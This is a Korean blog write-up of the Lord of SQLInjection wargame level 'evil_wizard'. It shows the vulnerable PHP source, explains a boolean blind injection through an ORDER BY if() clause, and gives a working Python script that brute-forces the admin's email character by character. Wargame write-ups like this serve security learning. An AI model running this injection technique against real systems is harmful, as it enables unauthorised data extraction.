[ LOS ] Lord of SQLInjection 24번 풀이(evil_wizard)

sangjun

·

2022. 1. 13. 21:36

반응형

 

문제소스

id	email	score
query : select id,email,score from prob_evil_wizard where 1 order by
<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|proc|union|sleep|benchmark/i', $_GET[order])) exit("No Hack ~_~");
  $query = "select id,email,score from prob_evil_wizard where 1 order by {$_GET[order]}"; // same with hell_fire? really?
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    if($result['id'] == "admin") $result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_evil_wizard where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("evil_wizard");
  highlight_file(__FILE__);
?>

 

문제 분석 및 페이로드

1. time base, union 등등 b sqli가 안된다.

2. if문과 order by를 통해 email을 알아내자

3. if(조건, 1, 999999)를 해준다면 참일때 admin이 첫번째 컬럼으로 온다.

--> 이것으로 참과 거짓 구별 가능

 

import requests
import string
URL="https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
brute=string.digits+string.ascii_letters+string.punctuation
cookies={"PHPSESSID":"kmo07vm0qujgagfi56vspjh5f8"}
passwd=""
print(brute)
length=-1
#find passwd Length
for i in range(100):
    query=f"""?order=if(id='admin' and length(email)={i},1,999999)"""  #그냥 leng(pw)해주면 guest pw가 4라서 이상하게 나온다.
    response=requests.get(URL+query,cookies=cookies)
    if response.text.find("<td>admin</td>")<response.text.find("<td>rubiya</td>"):
        length=i
        break

print(f"pass length is {length}")
#find passwd
for i in range(1,length+1):
    for ch in brute:
        query=f"""?order=if(id='admin' and ord(mid(email,{i},1))={ord(ch)},1,999999)"""
        response=requests.get(URL+query,cookies=cookies)
        print(query)
        if response.text.find("<td>admin</td>")<response.text.find("<td>rubiya</td>"):
            passwd+=ch
            break

print(f"passwd is {passwd}")

반응형

0개의 댓글